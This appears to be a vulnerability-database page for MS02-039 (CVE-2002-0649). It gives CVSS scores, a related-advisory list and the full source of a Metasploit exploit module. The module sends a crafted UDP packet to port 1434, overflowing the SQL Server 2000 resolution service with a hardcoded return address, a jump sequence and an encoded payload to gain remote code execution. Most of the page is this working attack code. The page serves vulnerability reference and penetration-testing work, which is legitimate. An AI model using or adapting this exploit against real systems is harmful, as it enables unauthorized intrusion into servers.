Lucene search
HistoryNov 26, 2005 - 11:16 a.m.
MS02-039 Microsoft SQL Server Resolution Overflow
CVSS2
7.5
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
This is an exploit for the SQL Server 2000 resolution service buffer overflow. This overflow is triggered by sending a udp packet to port 1434 which starts with 0x04 and is followed by long string terminating with a colon and a number. This module should work against any vulnerable SQL Server 2000 or MSDE install (pre-SP3).
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = GoodRanking
include Msf::Exploit::Remote::MSSQL
def initialize(info = {})
super(update_info(info,
'Name' => 'MS02-039 Microsoft SQL Server Resolution Overflow',
'Description' => %q{
This is an exploit for the SQL Server 2000 resolution
service buffer overflow. This overflow is triggered by
sending a udp packet to port 1434 which starts with 0x04 and
is followed by long string terminating with a colon and a
number. This module should work against any vulnerable SQL
Server 2000 or MSDE install (pre-SP3).
},
'Author' => [ 'hdm' ],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2002-0649'],
[ 'OSVDB', '4578'],
[ 'BID', '5310'],
[ 'MSB', 'MS02-039'],
],
'Privileged' => true,
'Payload' =>
{
'Space' => 512,
'BadChars' => "\x00\x3a\x0a\x0d\x2f\x5c",
'StackAdjustment' => -3500,
},
'Targets' =>
[
[
'MSSQL 2000 / MSDE <= SP2',
{
'Platform' => 'win',
'Ret' => 0x42b48774,
},
],
],
'Platform' => 'win',
'DisclosureDate' => '2002-07-24',
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(1434)
])
end
def check
info = mssql_ping
if (info['ServerName'])
print_status("SQL Server Information:")
info.each_pair { |k,v|
print_status(" #{k + (" " * (15-k.length))} = #{v}")
}
return Exploit::CheckCode::Detected
end
return Exploit::CheckCode::Safe
end
def exploit
connect_udp
print_status(sprintf("Sending UDP packet with return address 0x%.8x", target.ret))
print_status("Execute 'net start sqlserveragent' once access is obtained");
# \x68:888 => push dword 0x3838383a
buf = "\x04" + rand_text_english(800, payload_badchars) + "\x68:888"
# Return to the stack pointer
buf[ 97, 4] = [target.ret].pack('V')
# Which lands right here
buf[101, 6] = make_nops(6)
# Jumps 8 bytes ahead
buf[107, 2] = "\xeb\x08"
# Write to thread storage space to avoid a crash
buf[109, 8] = [0x7ffde0cc, 0x7ffde0cc].pack('VV')
# And finally into the payload
buf[117,payload.encoded.length] = payload.encoded
udp_sock.put(buf)
disconnect_udp
handler
end
end
Related
saint
saint
Microsoft SQL Server 2000 resolution service buffer overflow
2006-02-05 00:00:00
Microsoft SQL Server 2000 resolution service buffer overflow
2006-02-05 00:00:00
Microsoft SQL Server 2000 resolution service buffer overflow
2006-02-05 00:00:00
nvd
nvd
CVE-2002-0649
2002-08-12 04:00:00
cert
cert
packetstorm
packetstorm
Microsoft SQL Server Resolution Overflow
2009-10-30 00:00:00
checkpoint_advisories
checkpoint_advisories
Microsoft SQL 2000 Slammer Worm Denial of Service (CVE-2002-0649)
2014-06-09 00:00:00
MSSQL 2000MSDE Resolution Buffer Overflow - Ver2 (CVE-2002-0649)
2014-03-31 00:00:00
MS-SQL Monitor Protocol (CVE-2002-0649; CVE-2002-0650)
2005-02-01 00:00:00
exploitdb
exploitdb
Microsoft SQL Server - Resolution Overflow (MS02-039) (Metasploit)
2010-04-30 00:00:00
Microsoft SQL Server 2000 - Resolution Service Heap Overflow
2002-07-25 00:00:00
cvelist
cvelist
CVE-2002-0649
2002-07-26 04:00:00
cve
cve
CVE-2002-0649
2002-08-12 04:00:00
nessus
nessus
CVSS2
7.5
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
Related for MSF:EXPLOIT-WINDOWS-MSSQL-MS02_039_SLAMMER-